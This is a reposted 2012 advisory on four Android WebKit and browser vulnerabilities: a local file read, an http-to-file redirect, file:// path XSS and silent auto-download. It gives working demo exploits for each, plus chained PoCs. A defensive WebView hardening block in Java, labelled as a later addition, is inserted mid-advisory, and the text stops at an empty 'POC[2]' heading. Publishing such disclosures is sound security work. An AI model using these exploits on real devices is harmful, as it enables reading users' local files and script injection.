Android webkit XSS cross-domain Auto-Download vulnerability (vulnerability warning, Black Bar Safety Net)

2012-02-10T00:00:00
ID MYHACK58:62201233071
Type myhack58
Reporter Anonymous (佚名)
Modified 2012-02-10T00:00:00

Description

Android Multiple Vulnerabilities

Author: www.80vul.com [Email:5up3rh3i#gmail.com]

Release Date: 2012/2/8

References: http://www.80vul.com/android/android-0days.txt

Ph4nt0m Webzine 0x06 has been released [http://www.80vul.com/webzine_0x06/]. It carries three papers on Android application security, covering the development environment, browser security and inter-application communication, and publishes a number of 0days:

[0day-NO.0] android-webkit local cross-domain vulnerability

android-webkit allows a local html file to read across to any http domain and to local files. demo:

<script>
var request = false;
if(window.XMLHttpRequest) {
    request = new XMLHttpRequest();
    if(request.overrideMimeType) {
        request.overrideMimeType('text/xml');
    }
} else if(window.ActiveXObject) {
    var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP',
        'Microsoft.XMLHTTP',
        'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0',
        'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
    for(var i=0; i<versions.length; i++) {
        try {
            request = new ActiveXObject(versions[i]);
        } catch(e) {}
    }
}
xmlhttp=request;
//xmlhttp.open("GET", "file://///default.prop", false);
//xmlhttp.open("GET", "http://www.80vul.com/", false);
xmlhttp.send(null);
var ret = xmlhttp.responseText;
alert(ret);
</script>

[0day-NO.1] android-webkit cross-protocol vulnerability

this vul allows crossing from http to the file protocol. demo:

<iframe name=f src="location.php" ></iframe>
<script>
function init(){
    f.location = "file:///default.prop";
}
setTimeout(init,5000)
</script>

location.php codz:

<?php
header("Location:file:///80vul.com");
?>

[0day-NO.2] android-webkit file:// protocol xss vulnerability

On the android-webkit file:// protocol, the directory and file name are not filtered, which leads to cross-site scripting. demo:

visit this : file:///80vul.com/<script>alert(1);</script>

[0day-NO.3] android-browser/firefox auto download file vulnerability

android-browser/firefox handle Content-Disposition: attachment without any safety prompt, so through this vul a malicious html file is downloaded automatically to the user's local directory.

test this code:

<?php
//autodown.php
header("Content-Disposition: attachment:filename=autodown.htm");
$data=<<<android_xss_go
<script>alert(/xss/);</script>
android_xss_go;
print $data;
?>

the local file name and path:

android 1.x -> /sdcard/download/autodown.html
android 2.x-3.x -> /sdcard/download/autodown.htm
android 4.0 -> /sdcard/download/autodown.php
firefox -> /sdcard/download/autodown.php
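The defensive counterpart to NO.0, NO.1 and NO.3 for an app that embeds a WebView, added here as an example; it is not code from the 80vul advisory or from Android. It assumes the app supplies the hypothetical DownloadPrompt hook, and the two file-URL settings exist only on API 16 and later.

```java
import android.net.Uri;
import android.os.Build;
import android.webkit.DownloadListener;
import android.webkit.WebResourceResponse;
import android.webkit.WebSettings;
import android.webkit.WebView;
import android.webkit.WebViewClient;
import java.io.ByteArrayInputStream;

public final class HardenedWebView {
    /** App-supplied confirmation hook; hypothetical, not an Android API. */
    public interface DownloadPrompt { void ask(String url, String disposition, String mime); }

    public static void harden(WebView webView, final DownloadPrompt prompt) {
        WebSettings s = webView.getSettings();
        // NO.0: a page loaded from file:// must not read other local files or reach http origins.
        s.setAllowFileAccess(false);
        if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.JELLY_BEAN) { // API 16+
            s.setAllowFileAccessFromFileURLs(false);
            s.setAllowUniversalAccessFromFileURLs(false);
        }
        webView.setWebViewClient(new WebViewClient() {
            // NO.1: only http(s) navigations proceed; a redirect or script-driven
            // jump to file:// (or any other scheme) is swallowed.
            @Override
            public boolean shouldOverrideUrlLoading(WebView view, String url) {
                return !isHttp(url);
            }
            // That callback is not invoked for every load (POST, and subframe/redirect
            // handling varies by WebView version), so also refuse non-http resources
            // at the request layer (API 11+).
            @Override
            public WebResourceResponse shouldInterceptRequest(WebView view, String url) {
                if (isHttp(url)) return null; // null lets WebView load it normally
                return new WebResourceResponse("text/plain", "utf-8",
                        new ByteArrayInputStream(new byte[0]));
            }
        });
        // NO.3: never store a Content-Disposition: attachment response silently;
        // route it to the app's prompt so the user sees what would be saved.
        webView.setDownloadListener(new DownloadListener() {
            @Override
            public void onDownloadStart(String url, String ua, String disposition,
                    String mime, long length) {
                prompt.ask(url, disposition, mime);
            }
        });
    }

    static boolean isHttp(String url) {
        String scheme = Uri.parse(url).getScheme();
        return "http".equalsIgnoreCase(scheme) || "https".equalsIgnoreCase(scheme);
    }
}
```

This covers an app-embedded WebView only; the stock Android browser's own download path is outside the app's control.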

So, let's play a jigsaw puzzle:

POC[1]:

//[0day-NO.1]+[0day-NO.2]
<iframe name=f src="location.php" ></iframe>
<script>
function init(){
    f.location = "file:///ssss<sc"+"ript>alert(1);</sc"+"ript>/";
}
setTimeout(init,5000)
</script>

POC[2]:

//[0day-NO.1]+[0day-NO.3]
